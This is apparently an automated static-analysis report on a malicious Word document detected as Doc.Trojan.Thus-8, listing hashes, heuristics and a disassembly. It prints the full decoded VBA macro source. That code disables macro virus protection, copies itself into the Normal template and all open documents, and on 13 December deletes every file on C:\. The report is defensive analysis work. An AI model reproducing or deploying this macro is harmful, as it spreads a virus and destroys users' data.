Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd0e9c6c7e1b811d…

MALICIOUS

Office (OLE)

110.9 KB Created: 2009-08-31 19:14:00 Authoring application: Microsoft Word 11.5.6 First seen: 2016-09-01
MD5: 547e667e654d439456ca84d3dcb6759e SHA-1: 60bc331e45235c46a925de4b88b77e456c25f0da SHA-256: cd0e9c6c7e1b811d8a42ece8a283075b103039487a551b1f7998211356d900fb
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.005 Security Software Installation

The sample contains VBA macros that attempt to disable macro security and replicate the macro code to other documents, including the Normal template. This behavior is indicative of a self-propagating macro-based malware. The ClamAV detection 'Doc.Trojan.Thus-8' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-8
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        On Error Resume Next
        Application.Options.VirusProtection = False
        If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    'Thus_001'
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x07 bytes found
    Disassembly
    Attempted x86 opcode disassembly
    000018DC  07                pop es
    000018DD  07                pop es
    000018DE  07                pop es
    000018DF  07                pop es
    000018E0  07                pop es
    000018E1  07                pop es
    000018E2  07                pop es
    000018E3  07                pop es
    000018E4  07                pop es
    000018E5  07                pop es
    000018E6  07                pop es
    000018E7  07                pop es
    000018E8  07                pop es
    000018E9  07                pop es
    000018EA  07                pop es
    000018EB  07                pop es
    000018EC  07                pop es
    000018ED  07                pop es
    000018EE  07                pop es
    000018EF  07                pop es
    000018F0  07                pop es
    000018F1  07                pop es
    000018F2  07                pop es
    000018F3  07                pop es
    000018F4  07                pop es
    000018F5  07                pop es
    000018F6  07                pop es
    000018F7  07                pop es
    000018F8  07                pop es
    000018F9  07                pop es
    000018FA  07                pop es
    000018FB  07                pop es
    000018FC  07                pop es
    000018FD  07                pop es
    000018FE  07                pop es
    000018FF  07                pop es
    00001900  07                pop es
    00001901  07                pop es
    00001902  07                pop es
    00001903  07                pop es
    00001904  07                pop es
    00001905  07                pop es
    00001906  07                pop es
    00001907  07                pop es
    00001908  07                pop es
    00001909  07                pop es
    0000190A  07                pop es
    0000190B  07                pop es
    0000190C  07                pop es
    0000190D  07                pop es
    0000190E  07                pop es
    0000190F  07                pop es
    00001910  07                pop es
    00001911  07                pop es
    00001912  07                pop es
    00001913  07                pop es
    00001914  07                pop es
    00001915  07                pop es
    00001916  07                pop es
    00001917  07                pop es
    00001918  07                pop es
    00001919  07                pop es
    0000191A  07                pop es
    0000191B  07                pop es
    0000191C  07                pop es
    0000191D  07                pop es
    0000191E  07                pop es
    0000191F  07                pop es
    00001920  07                pop es
    00001921  07                pop es
    00001922  07                pop es
    00001923  07                pop es
    00001924  07                pop es
    00001925  07                pop es
    00001926  07                pop es
    00001927  07                pop es
    00001928  07                pop es
    00001929  07                pop es
    0000192A  07                pop es
    0000192B  07                pop es
    0000192C  07                pop es
    0000192D  07                pop es
    0000192E  07                pop es
    0000192F  07                pop es
    00001930  07                pop es
    00001931  07                pop es
    00001932  07                pop es
    00001933  07                pop es
    00001934  07                pop es
    00001935  07                pop es
    00001936  07                pop es
    00001937  07                pop es
    00001938  07                pop es
    00001939  07                pop es
    0000193A  07                pop es
    0000193B  07                pop es

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2374 bytes
SHA-256: 06d8b38a317377d80acbc28cd178ec410ded92e796ab90457409f9756b921d85
Detection
ClamAV: Doc.Trojan.Thus-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    Next k
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .NewSearch
        .LookIn = "C:\"
        .SearchSubFolders = True
        .FileName = "*.*"
        .MatchTextExactly = False
        .FileType = msoFileTypeAllFiles
        If .Execute > 0 Then
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End If
    End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub